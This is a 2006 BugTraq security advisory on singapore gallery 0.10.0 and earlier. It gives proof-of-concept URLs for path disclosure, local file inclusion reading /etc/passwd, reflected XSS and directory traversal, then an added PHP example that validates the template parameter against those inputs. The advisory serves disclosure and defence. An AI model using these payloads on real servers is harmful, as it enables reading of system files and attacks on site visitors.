BugTraq
singapore gallery <= 0.10.0 Multiple Vulnerabilities
Jun 18 2006 08:31AM
simo64 gmail com
Product : singapore gallery
Versions : 0.10.0 and prior
Site : http://www.sgal.org/
Discovered By : Moroccan Security Research Team (Simo64)
Greetz : CiM-Team - dabdoub - DarkbiteX - drackanz - Iss4m - Mourad - Rachid
.:r00tkita - s4mi - Silitix - tahati - And All Friends :)
[-] Vulnerable code near lines 16-35
<?
16 . require_once "includes/singapore.class.php";
19 . $sg = new Singapore();
35 . include $sg->config->base_path.$sg->config->pathto_current_template."index.tpl.php";
?>
[+] Full Path Disclosure :
**************************
Example:
http://localhost/singapore/index.php?template=simo64
Result :
Warning: main(templates/simo64/index.tpl.php): failed to open stream: No such file or directory in /home/sing/public_html/livedemo/index.php on line 35
[+] Local File Inclusion :
***************************
Proof Of Concept :
http://localhost/singapore/index.php?template=./../../../../etc/passwd%00
[+] Cross Site Scripting :
**************************
http://localhost/singapore/index.php?template=<script>alert('Moroccan Security Team');</script>
[+] Directory Traversal :
**************************
Proof Of Concept :
http://localhost/singapore/index.php?gallery=./../../../
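
As an added example (not part of the original advisory and not singapore's own code), here is one way to constrain the `template` value before it reaches the include on line 35, so that a rejected name never gets as far as the warning shown above. The function name `resolve_template_dir` and the throwaway directory layout are assumptions made for the demo.

```php
<?php
// Added example: hypothetical helper, not singapore's own code.
// Resolves a user-supplied template name to a directory strictly inside
// $templatesRoot, or returns null so the caller can fall back to a default.
function resolve_template_dir(string $templatesRoot, string $name): ?string
{
    // Allowlist the character set: rejects "/", "\", "..", NUL bytes and markup.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    $root = realpath($templatesRoot);
    if ($root === false) {
        return null;
    }
    // realpath() fails for nonexistent paths and resolves symlinks,
    // so containment is checked on the canonical path.
    $dir = realpath($root . DIRECTORY_SEPARATOR . $name);
    if ($dir === false || !is_dir($dir)
        || strncmp($dir, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0
        || !is_file($dir . DIRECTORY_SEPARATOR . 'index.tpl.php')) {
        return null;
    }
    return $dir;
}

// Constructed demo: build a throwaway templates tree and try the advisory's inputs.
$root = sys_get_temp_dir() . '/sg_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/default', 0700, true);
file_put_contents($root . '/default/index.tpl.php', '<?php // empty template');

$inputs = ['default', 'simo64', "./../../../../etc/passwd\0", "<script>alert(1)</script>"];
foreach ($inputs as $in) {
    $dir = resolve_template_dir($root, $in);
    // Escape anything derived from the request before echoing it.
    printf("%s => %s\n",
        htmlspecialchars(addcslashes($in, "\0..\37"), ENT_QUOTES, 'UTF-8'),
        $dir === null ? 'rejected' : 'accepted');
}

// Clean up the constructed tree.
unlink($root . '/default/index.tpl.php');
rmdir($root . '/default');
rmdir($root);
```

Only `default` is accepted; the nonexistent name, the traversal string with the NUL byte and the script tag are all rejected before any include is attempted.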
Copyright 2010, SecurityFocus